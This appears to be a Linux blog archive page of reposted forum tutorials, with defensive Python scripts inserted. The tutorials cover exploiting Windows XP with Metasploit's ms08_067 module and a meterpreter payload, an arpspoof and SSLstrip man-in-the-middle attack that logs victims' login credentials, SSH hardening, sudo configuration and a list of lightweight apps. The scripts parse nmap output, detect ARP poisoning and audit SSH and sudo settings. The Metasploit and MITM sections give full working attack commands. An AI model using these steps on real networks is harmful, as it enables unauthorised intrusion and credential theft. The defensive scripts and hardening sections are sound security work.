Tag: linux

  • An Introduction To The Metasploit Framework

    What is the Metasploit Framework?
    The Metasploit Framework is an incredible tool for pen-testers and hackers. Used globally by even the most professional of penetration testers, Metasploit presents the user with a large number of exploits, payloads and auxiliary modules which can all be used to test anything from the common household machine to complex servers in an office block. Whatever your reason is for using the Metasploit framework, you should rest assured that it will be one of the best tools in your arsenal.

    Starting up Metasploit
    Now, without further ado, let’s get down to business. I usually start by firing up Metasploit in a terminal, using the msfconsole version. Metasploit has a few different versions, including a more graphically based one. They all have their purposes, but I much prefer msfconsole just because it’s all command line based, and it’s very powerful. To start msfconsole, open up your terminal and type:

    Code:
    msfconsole

    Hit enter, and let it do its thing. If you’ve just updated or it’s your first time running the tool then it might take a little while to get started.

    Updating the Metasploit Framework
    Before we get started, you’ll probably need to update a few things. Run the command “msfupdate”. Inside each update, you will find new exploits, various patches, improvements, new payloads – basically everything you can think of. It’s a very well maintained piece of kit! I usually update the whole system before doing anything major anyway, just in case there’s been a significant update in one of my packages. Once you start updating, it will look something like this…

    Building Information on the Target using Nmap
    Before we run in all-guns-blazing and cause a big mess, we need to build up some information on our target. The basic things which we will need to determine are as follows:

    Target’s IP address (this will be internal for the sake of this guide)
    Which ports are open
    Which service is running on each port
    The operating system of the target machine

    As you go deeper into the world of pen-testing, you may find that you need more information on the subject. In fact, I recommend that you find out as much as you possibly can before starting a pen-test, using various information gathering techniques. I won’t go into detail here but I might write something on it in another article.

    Open up a new terminal. We’re going to be using Nmap to identify the IP address of the target machine on the network by running a ping-scan. This doesn’t test any ports, it just pings machines to see if they exist or not.

    Code:
    nmap -sP 192.168.0.1/24

    Running this command should return the IP addresses of machines on your network. Obviously you may need to switch your IP address up a little bit if it’s different to mine.

    So, I’ve picked the machine I want to attack. In my case, it’s the Intel machine using the internal IP address of 192.168.0.6. Now, let’s get some more in-depth information about this particular machine by running a port scan on it. I’m not going to bother with any real stealth on this scan seeing as it’s on my own network and I’m not trying to avoid detection. Therefore, I’ll only be using the -sS, -vv and -A flags for scanning. For a full list of nmap flags, check out the Nmap website. Run the command:

    Code:
    nmap -sS -A -vv 192.168.0.6

    This kicks out a shit load of information onto my screen (thanks to the -vv flag, which makes the scan output “very verbose”). The main things I’m looking at are the open ports on the machine.

    PORT STATE SERVICE VERSION
    135/tcp open msrpc Microsoft Windows RPC
    139/tcp open netbios-ssn
    445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
    2869/tcp open http Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)

    The bolded one is the one which I am going to try and exploit using the Metasploit framework. Unfortunately, I’m not going to do all the hard work for you. You need to get your Google hat on and start searching around for exploits for the services which came up in your nmap scan! Once you’ve found one, you might find that it’s already a part of the Metasploit Framework and you can search for it using the “search” function.
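A defender reads the same port table as an exposure inventory. The Python script below is an added example and not part of the original article: it parses the port table out of nmap's normal (human-readable) output, separates open ports from filtered or closed ones, and flags the legacy Windows services (135, 139, 445) whose exposure a scan like the one above reveals. The scan text it parses is constructed around the four open-port lines quoted above; the "Not shown", filtered 3389 and MAC lines are made up.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample of "nmap -sS -A -vv" output, cut down to the port table.
# The four open-port lines are the ones quoted in the article; the rest is made up.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.168.0.6
Host is up (0.0012s latency).
Not shown: 995 closed ports
PORT     STATE    SERVICE       VERSION
135/tcp  open     msrpc         Microsoft Windows RPC
139/tcp  open     netbios-ssn
445/tcp  open     microsoft-ds  Microsoft Windows XP microsoft-ds
2869/tcp open     http          Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)
3389/tcp filtered ms-wbt-server
MAC Address: 00:11:22:33:44:55 (constructed)
"""

# One row of nmap's port table: "<port>/<proto> <state> <service> [<version ...>]"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

# Windows services that should not be reachable beyond the host's own subnet.
LEGACY_WINDOWS_PORTS = {135: "MSRPC", 139: "NetBIOS session", 445: "SMB"}


def parse_nmap_ports(text: str) -> List[Dict[str, object]]:
    """Extract the port table from nmap's normal output; other lines are skipped."""
    rows: List[Dict[str, object]] = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue  # banner, "Not shown", MAC address line, etc.
        port, proto, state, service, version = m.groups()
        rows.append({
            "port": int(port),
            "proto": proto,
            "state": state,
            "service": service,
            "version": (version or "").strip(),  # empty when nmap printed no banner
        })
    return rows


def open_ports(rows: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Only the ports nmap saw as open; filtered and closed ports are dropped."""
    return [r for r in rows if r["state"] == "open"]


def flag_legacy_exposure(rows: List[Dict[str, object]]) -> List[Tuple[int, str, str]]:
    """Return (port, label, version) for each open legacy Windows service."""
    return [(r["port"], LEGACY_WINDOWS_PORTS[r["port"]], r["version"])
            for r in open_ports(rows) if r["port"] in LEGACY_WINDOWS_PORTS]


if __name__ == "__main__":
    for port, label, version in flag_legacy_exposure(parse_nmap_ports(SAMPLE_NMAP_OUTPUT)):
        print(f"{port}/tcp exposed: {label} ({version or 'no version banner'})")
```

Feeding it a saved scan (`nmap -sS -A -vv host > scan.txt`) gives a host-by-host list of what is reachable; the same table, fed into a ticketing or asset system, is the starting point for closing ports that have no business being open.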

    How to use Metasploit to Exploit a Computer
    Please note that I’m using old screenshots in this section as my laptop died. Everything is exactly the same, including the port/service and IP address used! Just don’t mind the old-school Backtrack design.

    So, we’ve got our IP address, our open ports, the services running on each port, and we’ve determined which service we’re going to exploit. Now we can get down to the fun part – exploiting and gaining access to the machine! Switch back to your msfconsole window and you should find that everything is loaded and ready to go. We’re going to do things in the following order:

    1. Search for and use an exploit
    2. Set the payload
    3. Set options
    4. Run the exploit

    1. To search for an exploit, type the word “search” followed by the keyword you wish to search for. For example, I’m looking for the ms08_067_netapi exploit, so I type the following into the console:

    Code:
    search ms08_067

    If you want to instead display every single exploit available in the Metasploit Framework, type “show exploits” into the console. Once you have found your exploit, you will need to “use” it so that Metasploit knows that it’s the one you want. To do this, type the following, replacing my exploit with your chosen one:

    Code:
    use exploit/windows/smb/ms08_067_netapi

    2. Next, you are going to need to set the payload which you will be using. A payload is something which runs after the exploit has been run, and can do many different things. For example, you may want to get a shell on the victim, in which case you’d choose one of the shell payloads. However, in this example I will be using a Meterpreter payload. Meterpreter is a very fun tool and I think you’ll enjoy it the most out of them all.

    To show all the payloads available, simply type in the following:

    Code:
    show payloads

    Or you can search for a specific one like I did, by typing:

    Code:
    search payloads meterpreter

    To set your payload, type the following into the console, replacing my payload with one of your choice:

    Code:
    set PAYLOAD windows/meterpreter/bind_tcp

    3. Once your payload is set, we need to quickly set a few options up. Type the following into your console to get the options up:

    Code:
    show options

    In my case, all I need to do is set the RHOST which is the IP address of the target machine. It’s already chosen the correct port for me.

    4. Finally, we’re ready to run the exploit! It’s as simple as typing…

    Code:
    exploit

    Now, you’ll see the exploit getting to work!

    I’ve popped open a Meterpreter session, as you can see in the screenshot. This allows me to do a shit load of stuff, which you can read about in the Metasploit Unleashed guide. For the purpose of the guide, I popped open a shell on the other computer after migrating to a different process. This shows the power of the Metasploit Framework and Meterpreter!

    So, what next?
    This guide was designed to push you in the right direction, as I really wanted something like this to read when I was first learning about MSF. Next, you should read about maintaining access to the computer with a backdoor, and other things. I totally recommend reading up on a few things though, so check out these links for more information.

    Metasploit Unleashed
    Nmap Reference Guide

    Discuss http://www.totse.info/bbs/showthread.php/17651-An-Introduction-To-The-Metasploit-Framework

  • How to Perform a Man In The Middle Attack Using Arpspoof and SSLstrip

    SSLstrip is a tool which you can use when you’re performing MITM (Man In The Middle) attacks. It’s very fun to use and can often produce some very interesting results, especially when combined with other tools such as Driftnet, MSGsnarf or URLsnarf! These particular tools can uncover things such as URLs which the victim is clicking on, images from the website which the victim is currently surfing (which you can actually save onto your own PC) and even real-time chats on Instant Messaging software like IRC. SSLstrip allows you to capture login information such as usernames and passwords.

    For this guide, you will need a computer with arpspoof and SSLstrip installed, as well as nmap for finding your target’s IP address. I recommend downloading Backtrack as it comes with all these tools out of the box.

    How to Enable IP Forwarding

    Enabling IP forwarding allows packets to pass through your machine. You need this to happen so that you can get in the middle of the victim’s machine and the router, hence the name “Man in the Middle”. To enable IP forwarding, type this into a terminal:

    echo 1 > /proc/sys/net/ipv4/ip_forward

    How to Configure your IPtables for ARP Spoofing

    Get your terminal up on the screen and type in the following:

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

    As you can probably tell, this will forward outgoing traffic on port 80 from the victim’s machine to your machine, which is going to be running SSLstrip on port 8080.

    Finding Your Target’s IP address

    Open a terminal and do a ping scan of the network, by issuing a command such as:

    nmap -sP 192.168.0.1-255

    Find the machine which you want to do a MITM attack on and copy down its IP address somewhere. That’s all we need to do for this step, so move on!

    How to use Arpspoof

    [Screenshot: Arpspoof running on Backtrack Linux]

    Arpspoofing allows you to redirect packets from the victim’s computer, straight to your machine. You then pass the packets along to the router as normal, meaning that the victim won’t even know it’s happening. After you capture traffic, SSLstrip will modify it before IPtables sends it away again. Fire up a new terminal and type in the following:

    arpspoof -i wlan0 -t 192.168.0.5 192.168.0.1

    The -i flag determines the interface used, and the -t flag is your target IP address. The second IP address is that of the router. Once you hit enter, you should start to see incoming traffic from the victim, which is then forwarded to the router.

    How to use SSLstrip to Capture Login Credentials

    Open another terminal. Navigate to /pentest/web/sslstrip and run SSLstrip by typing the following command:

    python ./sslstrip.py -k -l 8080 -w /root/Desktop/sslstrip.log

    This will start SSLstrip, listening on port 8080. The -w flag allows you to write your results to a file. The -k flag also kills all current sessions, forcing the client to log into websites again. Feel free to remove this flag if that’s not something you want to do.

    If you open another terminal window/tab and type “tail -F /root/Desktop/sslstrip.log” then you will get real-time updates as the log file is written to. When a user logs into a website, their login credentials will be displayed in the file, like this!

    Re-ARPing

    Hit CTRL+C to kill your ARP spoofing, your SSLstrip and anything else you’ve got going on. This has a very high chance of putting the whole network offline for a second, which is the only downside to ARP spoofing. However, it shouldn’t be a problem as everything will right itself quickly!

    Enjoy.
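From the defender's side, the attack described in this post leaves a visible trace in the victim's own ARP cache: the gateway's entry suddenly carries a different MAC address, and that same MAC also answers for another IP on the LAN. The script below is an added example, not part of the original post. It parses two snapshots of `ip neigh show` output and reports those two conditions. The snapshots are constructed from the viewpoint of the 192.168.0.5 host used above; all MAC addresses and the 192.168.0.9 and 192.168.0.12 hosts are made up.

```python
import re
from typing import Dict, List, Tuple

# One line of "ip neigh show": <ip> dev <iface> lladdr <mac> <state>
NEIGH_LINE = re.compile(
    r"^(?P<ip>\S+)\s+dev\s+(?P<dev>\S+)\s+lladdr\s+"
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})\s+(?P<state>\S+)$",
    re.IGNORECASE,
)

# Constructed snapshots taken on 192.168.0.5 (wlan0). Before: every IP has its own
# MAC. After: the gateway entry carries the MAC of 192.168.0.9, the hallmark of a
# poisoned cache. All MAC addresses are made up.
BASELINE = """\
192.168.0.1 dev wlan0 lladdr 00:11:22:aa:bb:01 REACHABLE
192.168.0.9 dev wlan0 lladdr 00:11:22:aa:bb:09 STALE
192.168.0.12 dev wlan0 lladdr 00:11:22:aa:bb:0c REACHABLE
192.168.0.77 dev wlan0 FAILED
"""
POISONED = """\
192.168.0.1 dev wlan0 lladdr 00:11:22:aa:bb:09 REACHABLE
192.168.0.9 dev wlan0 lladdr 00:11:22:aa:bb:09 REACHABLE
192.168.0.12 dev wlan0 lladdr 00:11:22:aa:bb:0c STALE
"""


def parse_neigh(text: str) -> Dict[str, str]:
    """Map IP -> MAC (lower-case). Entries with no lladdr (FAILED/INCOMPLETE) are skipped."""
    table: Dict[str, str] = {}
    for line in text.splitlines():
        m = NEIGH_LINE.match(line.strip())
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table


def check_arp_table(baseline: Dict[str, str], current: Dict[str, str],
                    gateway_ip: str) -> List[Tuple[str, str]]:
    """Compare two snapshots and return (severity, message) findings."""
    findings: List[Tuple[str, str]] = []

    # 1. The default gateway's MAC should be stable; a change mid-session is the
    #    first thing an ARP-cache poisoning attack produces on the victim.
    old_gw, new_gw = baseline.get(gateway_ip), current.get(gateway_ip)
    if old_gw and new_gw and old_gw != new_gw:
        findings.append(("high", f"gateway {gateway_ip} MAC changed {old_gw} -> {new_gw}"))

    # 2. One MAC answering for several IPs means one host is claiming addresses
    #    that are not its own; rated high when the gateway is among them.
    by_mac: Dict[str, List[str]] = {}
    for ip, mac in current.items():
        by_mac.setdefault(mac, []).append(ip)
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            sev = "high" if gateway_ip in ips else "medium"
            findings.append((sev, f"MAC {mac} claims {len(ips)} addresses: {', '.join(sorted(ips))}"))
    return findings


if __name__ == "__main__":
    for sev, msg in check_arp_table(parse_neigh(BASELINE), parse_neigh(POISONED), "192.168.0.1"):
        print(f"[{sev}] {msg}")
```

In use, a cron job or a small loop would capture `ip neigh show` every few seconds and pass the previous and current snapshots to `check_arp_table`. A static entry for the gateway on important hosts and Dynamic ARP Inspection on managed switches stop the poisoning itself; on the web side, HSTS is what defeats the HTTP-to-HTTPS downgrade that SSLstrip depends on.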

  • How to Set up and Secure an SSH Server

    What is SSH and Why Should I use it?

    This is something which I recently learned and it’s already come in handy for me and a couple of very trusted people. What is SSH and why should you use it, you ask? Well, for a start, the clue is in the name – Secure Shell. SSH provides a secure, encrypted tunnel between two computers which can’t be sniffed (at least, not to my knowledge) which you can use to access your home machine when you’re out of the house. Through a secure shell, you can use the terminal to run commands, transfer files or even use your home internet connection from elsewhere!

    How to install OpenSSH Server

    Firstly, run this command to download and install the server software.

    Quote:
    sudo apt-get install openssh-server

    If you want, you can check that the server is running at this point by trying to connect to yourself by running the following command. It’s not necessary though, and there’s a chance that it might not work before configuring things first.

    Quote:
    ssh username@localhost

    How to Configure and Secure an SSH Server

    The configuration and security processes go hand in hand and can actually be done at the same time, making this a fairly easy thing to do. Unfortunately, it can be a little confusing for a total beginner. I had no idea what I was doing when I first had a shot at setting up my server, but I soon learned the ropes. Anyway, here’s a quick overview of what we’ll be doing:

    • Opening a port on our router to allow incoming SSH traffic.
    • Editing our sshd_config file.
    • Taking a few security measures, such as disabling root logins and using authentication keys as opposed to passwords.

    Opening a port on our router to allow incoming SSH traffic

    So, go ahead and open up your router configuration page and add a firewall exception for a port of your choice. DON’T use port 22, even if it is the default SSH port. This will stop a lot of automated tools from scouring the web, finding your server and trying to access it. Choose a different port, such as 443 – the port which usually runs the HTTPS service. The benefit of using this port is that if you’re establishing a connection from an organization (at work or school, for example), they could be blocking port 22; if you use 443, your traffic will appear to be travelling using the HTTPS protocol.

    Editing our sshd_config file

    Open your file manager with root privileges (I’ll be using Nautilus for this tutorial) and browse to your “/etc/ssh” directory. In here is where your configuration file is located, and you’ll need to open up your sshd_config file. The first thing you will need to do is change the listening port to whatever you specified it as on your router configuration page – probably 443, like I suggested.

    How to Secure an SSH Server

    [Screenshot: sshd_config]

    1. Scroll down and find the line “PermitRootLogin” – change the “yes” to a “no”.
    2. Make sure that “RSAAuthentication” and “PubkeyAuthentication” are both set to “yes”, and that “AuthorizedKeysFile” is uncommented (remove the hash at the start of the line).
    3. Scroll down, and check that “PermitEmptyPasswords” is set to “no”.
    4. Make sure that “PasswordAuthentication” is set to “no” as well – this will force the use of authentication keys, which is MUCH more secure than password authentication which can be brute-forced.
    5. Finally, scroll right to the bottom and make sure that “UsePAM” is set to “no”.
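To check an existing sshd_config against the five points above (plus the non-default port and the uncommented AuthorizedKeysFile), here is an added Python checker that is not part of the original article. It follows sshd's own rule that the first value given for a keyword wins, and it only reads the global section (it stops at the first Match block). RSAAuthentication is only checked when present, because it is a protocol-1 keyword that newer OpenSSH releases no longer accept. The two configurations it is run against are constructed samples.

```python
import re
from typing import Dict, List

# Keyword -> value the article asks for (keywords are compared case-insensitively).
EXPECTED = {
    "PermitRootLogin": "no",
    "PubkeyAuthentication": "yes",
    "PermitEmptyPasswords": "no",
    "PasswordAuthentication": "no",
    "UsePAM": "no",
}

# Constructed samples: STOCK resembles a fresh install, HARDENED follows the article.
STOCK = """\
Port 22
Protocol 2
PermitRootLogin yes
#AuthorizedKeysFile     .ssh/authorized_keys
PasswordAuthentication yes
UsePAM yes
"""
HARDENED = """\
Port 443
PermitRootLogin no
PubkeyAuthentication yes
AuthorizedKeysFile .ssh/authorized_keys
PermitEmptyPasswords no
PasswordAuthentication no
UsePAM no
# sshd keeps the FIRST value of a keyword, so this later duplicate changes nothing.
PasswordAuthentication yes
"""


def parse_sshd_config(text: str) -> Dict[str, str]:
    """Return {lowercase keyword: first value} for the global section of an sshd_config."""
    settings: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # comments dropped; commented-out keywords vanish here
        if not line:
            continue
        if line.lower().startswith("match"):
            break  # conditional Match blocks are out of scope for this global check
        parts = re.split(r"\s+|=", line, maxsplit=1)  # "Port 443" and "Port=443" are both valid
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        settings.setdefault(key, value)  # first occurrence wins, as in sshd
    return settings


def audit_sshd_config(settings: Dict[str, str]) -> List[str]:
    """List every deviation from the article's hardening checklist."""
    findings: List[str] = []
    if settings.get("port", "22") == "22":
        findings.append("Port is 22 (default); the article recommends a non-default port")
    for keyword, wanted in EXPECTED.items():
        have = settings.get(keyword.lower())
        if have is None:
            findings.append(f"{keyword} is not set explicitly (wanted '{wanted}')")
        elif have.lower() != wanted:
            findings.append(f"{keyword} is '{have}' (wanted '{wanted}')")
    if "authorizedkeysfile" not in settings:
        findings.append("AuthorizedKeysFile is missing or commented out")
    # Protocol-1 keyword: only checked when present, since newer OpenSSH rejects it.
    if settings.get("rsaauthentication", "yes").lower() != "yes":
        findings.append("RSAAuthentication is not 'yes'")
    return findings


if __name__ == "__main__":
    for name, text in (("stock", STOCK), ("hardened", HARDENED)):
        print(name, audit_sshd_config(parse_sshd_config(text)) or ["ok"])
```

Reading the real file (`open("/etc/ssh/sshd_config").read()`) instead of the samples turns this into a quick pre-restart check; `sshd -t` remains the authoritative syntax test before the service is restarted.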

    How to Connect to Your SSH Server

    [Screenshot: PuTTYgen key generator]

    Now that the security is all taken care of, you will be eager to connect another device to your server. Grab your laptop (or whatever you’re using) and make sure that some kind of SSH client is installed on it. For Windows, you’ll be using PuTTY, Linux users might want to use openssh-client and for the people on Android Phones, download Connectbot.

    Now, you’re going to need to generate a set of authentication keys. One is a private key, which will stay with you on your device – the other being a public key, which you will need to transfer to your server. If you’re on Windows, use the PuTTYGen application. Android users should open the menu and “Manage Pubkeys” to generate one, and Linux users should run the following command…

    Quote:
    ssh-keygen -t rsa

    This will create an RSA key pair for you to use. Now, take a note of where the key is saved (if you’re on Windows or Android, don’t worry about this as it will be obvious what your public key is). Find a way of transferring your public key to your server – I usually just put it on a USB stick or email it to myself.

    How to Authenticate Your Device With the Server

    Once your public key is at hand, you’re going to need to add it to your “authorized_keys” file. So, open up your public key file and copy your key! Now, browse to the following location:

    Quote:
    /home/USERNAME/.ssh/authorized_keys

    On the very first line of your file, paste your public key. Note that there can only be 1 key per line, so when you add more devices in the future, make sure you hit enter and go onto the second line before pasting your next key in.

    Restart the Server Service

    After messing around with any configurations, you need to restart the server service. You can do this by running the following command…

    Quote:
    sudo /etc/init.d/ssh restart

    I found it beneficial to put that into a bash script called “ssh_restart”, so that I could quickly restart the server if I needed to.

    Connect to Your Server!

    [Screenshot: ConnectBot SSH login]

    On the other device, open up your SSH client and enter the correct information. For example, PuTTY users will need to specify your server IP address, hostname and port number to connect, as will Android devices. If you’re running Linux, then enter the following command…

    Quote:
    ssh username@hostname -p 443 (or whatever port you specified)

    The server should then recognize that you’re authenticated already with the public key, and you should be presented with a shell!

    Useful Links

    Using PuTTYgen to create keys
    OpenSSH Website
    SSH Wikipedia Article

    Discuss http://www.totse.info/bbs/showthread.php?t=15379

  • How to Use Sudo (and Why Ubuntu Sucks)

    Sudo – How it should and should not be used

    (And why Ubuntu sucks)

    I love sudo. Yet at the same time I hate the Ubuntu trend of disabling the root account and giving the first user full root privileges through sudo. Hate it with a passion. So in this guide I will explain what sudo is, what it isn’t and how you should use it.

    What is sudo?

    Sudo – superuserdo – is an application which temporarily elevates the privileges of a regular user account to root privileges. This allows a user to run applications or commands with root privileges, even though the account on which the application is running is not a root account. Sudo can be configured to only allow certain predetermined applications & commands to be run with root privileges, or to allow anything and everything which has “sudo” in front of it to run with root privileges.

    This is most useful in two cases:

    1. Untrusted user: If you need to let somebody perform certain administrative tasks on a box but you don’t want to give him / her access to your root account. You give him a regular account and add a line to your /etc/sudoers file allowing him to run all the apps he needs to run with root privileges. He can do the job, but he can’t do anything else to compromise the security of the system.
    2. Insecure application: Very few applications should ever be run as root. If for some reason an application requires root privileges (and you’re sure the application can be trusted and there is no way to do what needs to be done without root privileges) you can allow that application to run with root privileges, and only that application. That way the damage which can be done through an exploit of the application is minimized; again if and only if the application is not a hacking tool itself.

    Now, again, because a lot of people fail to understand this: any application run with sudo runs with full root privileges, even though it runs from a regular account. If you do not trust an application, do not run it with root privileges, be it from the root account or through sudo. The application can do pretty much anything it wants to do once you’ve allowed it to run through sudo, including handing over the controls of your machine to a hacker.

    So why bother using sudo at all, if you can’t run anything you don’t trust through sudo, you ask? Because trusted applications are at risk of exploits too. Through those exploits it is possible for a hacker to inject little pieces of code into your machine. Now if the exploited application is running in a regular user account which cannot run anything but a couple of specific applications as root, it’s a lot harder for the hacker to let his malware run with root privileges. He would have to make it look like the malware he injected is part of the binary executable of one of the trusted applications, because only those can be called through sudo. And because the binary executables can only be modified with root privileges, that’s not an easy task. I’m pretty sure it’s not impossible either, but security is all about staying one step ahead of the bad guys so it does improve security tremendously.

    Why ubuntu sucks

    If you’ve paid attention, you now realize the whole sudo-instead-of-root mess Canonical pushes the majority of Linux users into is actually a security flaw instead of a security enhancement. In Ubuntu the first user account, and any following accounts which get appointed administrator privileges, can run anything through sudo. Anything at all. That means it just got a whole lot easier for our hacker to get his malware to run with root privileges. All he has to do is log your sudo password and run his code through sudo. From that moment on it is running with full root privileges.

    Quick intro to sudo configuration

    Configuring sudo is done by editing the /etc/sudoers file through visudo as root. Visudo is a little application which makes sure no two people are editing the /etc/sudoers file at the same time and which checks the file for basic syntax errors before saving it.

    By default visudo uses vi as editor. If you don’t like using vi, run this command to run visudo with nano (or any other editor you prefer) once:

    Code:
    # EDITOR=nano visudo

    Here is a very simple example of an /etc/sudoers file from my download server:

    Code:
    # sudoers file.
    #
    # This file MUST be edited with the 'visudo' command as root.
    # Failure to use 'visudo' may result in syntax or file permission errors
    # that prevent sudo from running.
    #
    # See the sudoers man page for the details on how to write a sudoers file.
    #
    
    # Host alias specification
    
    # User alias specification
    
    # Cmnd alias specification
    
    # Defaults specification
    
    # Set default editor to nano:
    Defaults        editor=/usr/bin/nano, !env_editor
    
    # Runas alias specification
    
    # User privilege specification
    root    ALL=(ALL) ALL
    amie    ALL= /usr/bin/pacman
    
    # Uncomment to allow people in group wheel to run all commands
    # %wheel        ALL=(ALL) ALL
    
    # Same thing without a password
    # %wheel        ALL=(ALL) NOPASSWD: ALL
    
    # Samples
    # %users  ALL=/sbin/mount /cdrom,/sbin/umount /cdrom
    # %users  localhost=/sbin/shutdown -h now

    As you can see in the example above, I’ve changed the default visudo editor to nano and I’ve allowed myself to run pacman (the package manager of Arch Linux) with elevated privileges. This is because I like to use yaourt as a package manager because it can automatically add and update packages from the Arch user repositories. However, I do not want to run yaourt with root privileges because it’s not a part of the most closely reviewed and most secure “core” applications. Luckily, the people who coded yaourt are as security-minded as I am so they made sure yaourt can run with user privileges. It just needs to be able to call pacman through sudo to let pacman take care of the real installation / uninstallation work. If an application on my regular account – which is not the account used for downloading or logging into my X-server, mind you – gets exploited there is not much harm done. The worst that can happen is that it starts installing applications from the trusted Arch repositories to my system / uninstalls any applications from my system. Annoying? Yes. Possibly harmful? Yes. But not nearly as bad as what could happen if I had been using my root account or if I had used sudo like an Ubuntu-monkey.

    Now as you probably noticed, there are a lot of sections in that sudoers file which I haven’t even touched. That’s because sudo can be configured to allow multiple users to run different apps with root privileges on different hosts all from the same sudoers file. That way the senior system administrator only has to write one sudoers file and configure all his boxes to automatically rsync their sudoers file with the one he edited. Voila, adding a new junior sysadmin to several boxes with different permissions on each box has never been easier. Here’s an example of a more advanced (but still very basic) sudoers configuration in which all configuration options are explained pretty well.
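An added example (not from the original post) for auditing a sudoers file for exactly the pattern criticised above: a small Python parser for plain user-privilege lines of the form `user host=(runas) [NOPASSWD:] command, command` (Defaults, alias definitions and #include directives are skipped, and alias references are not expanded) and an audit that reports any non-root principal allowed to run ALL, with `NOPASSWD: ALL` rated highest. The sample file is constructed from the one shown above, with the %wheel NOPASSWD line uncommented to give the audit something to find.

```python
import re
from typing import List, NamedTuple, Tuple


class Grant(NamedTuple):
    user: str         # user name, %group or +netgroup
    host: str
    runas: str        # contents of "(...)"; "root" when omitted (sudo's default)
    nopasswd: bool    # True if any command on the line carries NOPASSWD:
    commands: List[str]


# "user host=(runas) [TAG:] cmd, cmd" - the plain privilege lines used in the post
SPEC_LINE = re.compile(
    r"^(?P<user>[%+]?[\w.-]+)\s+(?P<host>[\w.,-]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$"
)
TAG = re.compile(r"^(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV|LOG_INPUT|NOLOG_INPUT|"
                 r"LOG_OUTPUT|NOLOG_OUTPUT|MAIL|NOMAIL|FOLLOW|NOFOLLOW):\s*")
SKIP_PREFIXES = ("Defaults", "User_Alias", "Host_Alias", "Cmnd_Alias", "Runas_Alias")

# Constructed from the post's sudoers file, with the %wheel NOPASSWD line uncommented.
SAMPLE_SUDOERS = """\
# This file MUST be edited with the 'visudo' command as root.
Defaults        editor=/usr/bin/nano, !env_editor
root    ALL=(ALL) ALL
amie    ALL= /usr/bin/pacman
%wheel  ALL=(ALL) NOPASSWD: ALL
%users  ALL=/sbin/mount /cdrom,/sbin/umount /cdrom
%users  localhost=/sbin/shutdown -h now
"""


def parse_sudoers(text: str) -> List[Grant]:
    """Parse plain privilege lines; comments, Defaults, alias definitions and #include are skipped."""
    grants: List[Grant] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = SPEC_LINE.match(line)
        if not m:
            continue  # lines using alias references are not modelled here
        nopasswd = False
        commands: List[str] = []
        for cmd in (c.strip() for c in m.group("rest").split(",")):
            t = TAG.match(cmd)
            while t:  # a tag applies to the command it precedes and those after it
                if t.group(1) == "NOPASSWD":
                    nopasswd = True
                cmd = cmd[t.end():]
                t = TAG.match(cmd)
            commands.append(cmd)
        grants.append(Grant(m.group("user"), m.group("host"),
                            m.group("runas") or "root", nopasswd, commands))
    return grants


def audit_sudoers(grants: List[Grant]) -> List[Tuple[str, str]]:
    """Flag unrestricted grants; root's own conventional line is skipped."""
    findings: List[Tuple[str, str]] = []
    for g in grants:
        if g.user == "root":
            continue
        if "ALL" in g.commands:
            sev = "high" if g.nopasswd else "medium"
            msg = f"{g.user}@{g.host} may run ANY command as ({g.runas})"
            findings.append((sev, msg + (" without a password" if g.nopasswd else "")))
    return findings


if __name__ == "__main__":
    for sev, msg in audit_sudoers(parse_sudoers(SAMPLE_SUDOERS)):
        print(f"[{sev}] {msg}")
```

Run against a real file (`sudo cat /etc/sudoers` plus the fragments in /etc/sudoers.d), the "medium" findings are the Ubuntu-style grants the post objects to; the restricted lines for amie and %users produce no finding, which is the shape the post recommends.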

    If this guide made you gasp and think “Wow, and I thought I was being SAFE using sudo the canonical way!” my job here is done and you’re on your way to securing your box.

    Discuss http://www.totse.info/bbs/showthread.php?t=9672

  • Lightweight Linux Apps

    Here I will list light apps. I will not include CLI apps. I will keep editing this; help make this list better.

    Terminal

    • xterm (installed on all distros)
    • lxterminal
    • mrxvt
    • xfce-terminal
    • mterminal

    Web browser.

    • midori
    • arora
    • conkeror
    • Dooble
    • reKonq
    • epiphany
    • dillo
    • uzbl (if you can work out the vi-like controls)
    • Kazehakase

    Office

    • Abiword (wordprocessor)
    • GNUmeric (spreadsheet)
    • scribus (desktop publishing)
    • xpdf
    • mupdf
    • apvlv
    • epdfview
    • leafpad (text editor)
    • gvim
    • nano (really a CLI tool but you’ll hardly notice)

    Multimedia

    • gnome-mplayer
    • smplayer
    • DeaDBeeF (foobar2000 like)
    • Banshee (not particularly lightweight – but my personal favorite)
    • Kaffeine
    • mpd + (quod libet, sonata, pympd, Xfmpc) but I don’t recommend this type of daemon/client setup as it never works right.
    • Xfburn (disc burning)

    IM

    • empathy (Ubuntu default)
    • emesene (MSN only)
    • Sim-IM (Multi protocol)
    • Ayttm (my personal favorite lightweight multi-protocol IM)
    • LostIRC
    • WeeChat (irc)

    Torrents

    • Deluge
    • transmission (Ubuntu default)
    • qBittorrent

    Image Editors

    • mtpaint
    • Xpaint
    • GNUpaint

    Image Viewers

    • feh
    • ristretto
    • mirage

    Filemanager

    • Thunar
    • pcmanFM
    • Rox-filer

    Compression

    • Squeeze
    • Xarchive
    • Xarchiver

    Process monitors

    • htop (ncurses but user-friendly)
    • lxmonitor

    WM/DE
    I will not include tiling managers.

    • Xfce4 (the most popular “lightweight” DE – currently suffering from feature creep – closer to middle weight)
    • fluxbox (I was a heavy user of this WM for a while)
    • fvwm (currently my favorite lightweight WM)
    • TWM (comes with Xorg – very featureless)
    • Windowmaker (inspired by NeXTSTEP – I could never get the hang of those boxes)
